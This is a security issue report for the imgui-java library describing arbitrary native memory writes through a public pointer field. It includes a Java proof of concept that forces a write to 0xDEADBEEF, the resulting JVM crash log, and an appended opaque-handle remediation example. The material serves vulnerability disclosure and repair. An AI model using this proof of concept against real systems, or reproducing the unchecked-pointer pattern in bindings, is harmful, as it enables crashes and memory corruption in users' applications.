
[Security] Arbitrary Memory Access via Public Pointer Field #366

@Sp1d3rL1

Description


Version

latest

What happened?

Remediate a security vulnerability.

I’ve prepared a detailed vulnerability report, which can be found at link. Please refer to it for the reproduction steps and remediation plan.

Reproduction

The following Java code triggers a segmentation fault (or assertion failure) by writing to an invalid memory address (0xDEADBEEF), proving that the native layer trusts the user-supplied pointer.

Environment: macOS/Linux, JDK 21.
Build: Build the project normally using ./gradlew build (or generateLibs).
Exploit code (ReproduceImgui.java), as follows:

import imgui.ImGui;
import imgui.ImGuiIO;

public class ReproduceImgui {
    static {
        // Load the library generated by the build
        try {
            System.loadLibrary("imgui-java64");
        } catch (Throwable e) {
            e.printStackTrace();
            System.exit(1);
        }
    }

    public static void main(String[] args) {
        System.out.println("   ImGui-Java Arbitrary Memory Access PoC");
        try {
            ImGui.createContext();

            long maliciousPtr = 0xDEADBEEFL;
            System.out.println("[*] Creating ImGuiIO wrapper with malicious ptr: 0x" + Long.toHexString(maliciousPtr));

            // VULNERABILITY: 'ptr' field is trusted by native layer
            ImGuiIO badIO = new ImGuiIO(maliciousPtr);

            System.out.println("[*] Triggering native dereference...");
            // Native method calls: ((ImGuiIO*)ptr)->ConfigFlags = 0;
            // Writes 0 to 0xDEADBEEF -> CRASH
            badIO.setConfigFlags(0);
        } catch (Throwable t) {
            t.printStackTrace();
        }
    }
}

Compiling and running the above code against the imgui-java library results in a native crash.

Relevant log output

[+] Original IO Ptr: 0x12805c808
[*] Creating ImGuiIO with malicious ptr: 0xdeadbeef
[*] Triggering native dereference...
#
# A fatal error has been detected by the Java Runtime Environment:
#
#  SIGSEGV (0xb) at pc=0x0000000126243838, pid=47777, tid=4611
#
# JRE version: Java(TM) SE Runtime Environment (21.0.3+7) (build 21.0.3+7-LTS-152)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0.3+7-LTS-152, mixed mode, sharing, tiered, compressed oops, compressed class ptrs, g1 gc, bsd-aarch64)
# Problematic frame:
# C  [libimgui-java64.dylib+0x2f838]  Java_imgui_ImGuiIO_nSetConfigFlags+0x48
#
# No core dump will be written. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# /Users/spider/Temp/imgui-java/imgui-binding/hs_err_pid47777.log
#
# If you would like to submit a bug report, please visit:
#   https://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
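The root cause described in this issue is a wrapper whose pointer field and long-taking constructor are public, so any caller can hand the JNI layer an address it never allocated. The following is an added example of the opaque-handle pattern that removes that trust boundary; it is not imgui-java's code, and every name in it (SafeImGuiIO, HandleTable, nGetIO0, nSetConfigFlags0) is hypothetical. The idea: user code only ever holds a handle issued by the binding, the binding resolves that handle back to a pointer it obtained from the native side itself, and a handle it does not recognise is rejected before any native call is made.

```java
// Added example, not imgui-java's own code. Sketches the opaque-handle pattern that
// closes the bug above: callers never hold a raw native pointer, only a handle that the
// binding maps back to a pointer it handed out itself. All names here are hypothetical.
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicLong;

public final class SafeImGuiIO {

    /** Maps opaque handles to native pointers; only the binding itself can add entries. */
    static final class HandleTable {
        private static final Map<Long, Long> TABLE = new ConcurrentHashMap<>();
        private static final AtomicLong NEXT = new AtomicLong(1);

        // Called by binding code with a pointer that came from the native side, never from a caller
        static long register(long nativePtr) {
            if (nativePtr == 0L) {
                throw new IllegalArgumentException("native side returned a null pointer");
            }
            long handle = NEXT.getAndIncrement();
            TABLE.put(handle, nativePtr);
            return handle;
        }

        // Unknown or already released handles fail here, before any JNI call sees them
        static long resolve(long handle) {
            Long ptr = TABLE.get(handle);
            if (ptr == null) {
                throw new IllegalStateException("unknown or released handle: " + handle);
            }
            return ptr;
        }

        static void release(long handle) {
            TABLE.remove(handle);
        }
    }

    // Private field and private constructor: there is no public way to inject an address
    private final long handle;

    private SafeImGuiIO(long handle) {
        this.handle = handle;
    }

    // Hypothetical JNI entry points; the pointer argument only ever comes from HandleTable
    private static native long nGetIO0();
    private static native void nSetConfigFlags0(long ptr, int flags);

    /** The only way to obtain an instance: the pointer is produced natively, not supplied by the caller. */
    public static SafeImGuiIO getIO() {
        return new SafeImGuiIO(HandleTable.register(nGetIO0()));
    }

    public void setConfigFlags(int flags) {
        // A forged handle throws in resolve(); the native write never happens
        nSetConfigFlags0(HandleTable.resolve(handle), flags);
    }

    /** Frees the handle so later use is rejected instead of dereferencing stale memory. */
    public void destroy() {
        HandleTable.release(handle);
    }

    /** Demonstration: a caller-chosen value cannot reach the native layer. Runs without the native library. */
    public static boolean rejectsForgedHandle(long forged) {
        try {
            HandleTable.resolve(forged);
            return false;
        } catch (IllegalStateException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        // Constructed value: the same 0xDEADBEEF used in the issue's PoC, now treated as a handle
        System.out.println("forged handle 0xDEADBEEF rejected: " + rejectsForgedHandle(0xDEADBEEFL));
    }
}
```

The handle table deliberately lives on the Java side so that a lookup failure is an ordinary exception rather than a SIGSEGV in native code, and so that a destroyed object cannot be reused (a use-after-free in the native layer becomes a rejected lookup). The same check can additionally be mirrored in C by keeping the table there and passing only handles across JNI, which also keeps raw addresses out of Java entirely; the Java-side version shown here is the smaller change to an existing binding.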
